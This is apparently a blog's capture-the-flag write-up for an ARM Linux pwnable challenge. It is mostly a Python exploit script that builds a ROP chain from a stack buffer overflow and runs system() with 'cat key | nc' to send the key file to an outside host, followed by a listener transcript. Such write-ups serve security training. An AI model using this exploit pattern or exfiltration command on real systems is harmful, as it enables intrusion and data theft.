Category : Pwnables (0x41414141)
|
bsSummary : uninitialized variable, stack based buffer overflow, ROP on ARM linux
Exploit
#!/usr/bin/python # recv(4, buf, len(cmd)) -> system(buf) from socket import * from struct import pack import time, sys p = lambda x: pack("<L", x) HOST = "bitterswallow.shallweplayaga.me" PORT = 6492 send_data = 0x0001D9FC freespace = 0x00027628 system = 0xb6e5cbd8 command = "cat key | nc bean.b10s.org 31337" recvdata = 0x0001DC04 """ .text:0001E3C8 MOV R0, R6 .text:0001E3CC MOV R1, R7 .text:0001E3D0 MOV R2, R8 .text:0001E3D4 ADD R4, R4, #1 .text:0001E3D8 BLX R3 .text:0001E3DC CMP R4, R10 .text:0001E3E0 BNE loc_1E3C4 .text:0001E3E4 LDMFD SP!, {R3-R8,R10,PC} """ payload = "" payload += "a"*0x444 payload += p(0x0001E3E4) # .text:0001E3E4 F8 85 BD E8 / LDMFD SP!,{R3-R8,R10,PC} ########################### payload += p(0x0001E3F0) # .text:0001E3F0 1E FF 2F E1 / BX LR payload += p(0x00000000) * 2 payload += p(0x00000004) # r0 payload += p(freespace) # r1 payload += p(len(command)) # r2 payload += p(0x00000001) ########################### payload += p(0x0001E3C8) ########################### payload += p(0x11111111)*7 ########################### payload += p(recvdata) ########################### #payload += p(0x0001E3E4) # .text:0001E3E4 F8 85 BD E8 LDMFD SP!,{R3-R8,R10,PC} ########################### payload += p(0x0001E3F0) # .text:0001E3F0 1E FF 2F E1 BX LR payload += p(0x00000000)*2 payload += p(freespace) # r0 payload += p(0x00000001)*3 ########################### payload += p(0x0001E3C8) ########################## payload += p(0x11111111)*7 ########################## payload += p(system) ########################## s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) time.sleep(0.5) s.recv(1024) s.send("y") s.send("\x32") s.send("\x01\x00") s.send("b") time.sleep(0.5) s.recv(1024) s.send("y") time.sleep(0.5) s.send("\x3f") s.send(p(len(payload))[0:2]) s.send(payload) time.sleep(0.5) s.send("y") time.sleep(0.5) s.recv(1024) s.send(command) time.sleep(0.5) s.close() |
root@ubuntu:~/pwn100# ./exploit.py ----------------------------------------------------------- root@ubuntu:~# nc -lv 31337 Connection from 131.247.27.199 port 31337 [tcp/*] accepted The key is: sometimes you just have to suck it up |
'CTF' 카테고리의 다른 글
| [CTF][2024] LINE CTF 2024 - hacklolo (1) | 2024.04.04 |
|---|---|
| Secuinside 2012 Quals Pwnable Chal Exploits (0) | 2012.10.07 |
| Secuinside 2012 Quals - Classico (Exploit only) (0) | 2012.10.07 |
| Secuinside 2012 Quals - Roadie (Exploit only) (0) | 2012.10.07 |
| Secuinside 2012 Quals - Tribute (Exploit only) (0) | 2012.10.07 |
